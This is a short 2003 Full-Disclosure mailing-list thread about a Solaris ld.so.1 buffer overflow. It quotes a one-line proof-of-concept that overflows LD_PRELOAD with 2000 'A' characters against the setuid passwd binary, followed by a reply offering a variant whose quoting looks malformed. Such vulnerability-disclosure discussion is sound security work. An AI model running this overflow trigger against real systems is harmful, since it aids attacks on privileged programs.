> -----Original Message-----
> From: Jim Dew [mailto:[EMAIL PROTECTED] 
> Sent: Wednesday, July 30, 2003 8:19 PM
> To: Jouko Pynnonen
> Cc: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Re: Fwd: Re: Solaris ld.so.1 
> buffer overflow
> 
> 
> On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:
> > 
> > On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:
> > > Modify the command (you need to add a trailing slash) to be the 
> > > following:
> > > 
> > > LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
> > > 
> > > and try it again.
> > 
> 
> this segfaults on solaris 2.6
> 
Try moving the escape to *before* the backtick:
LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Reply via email to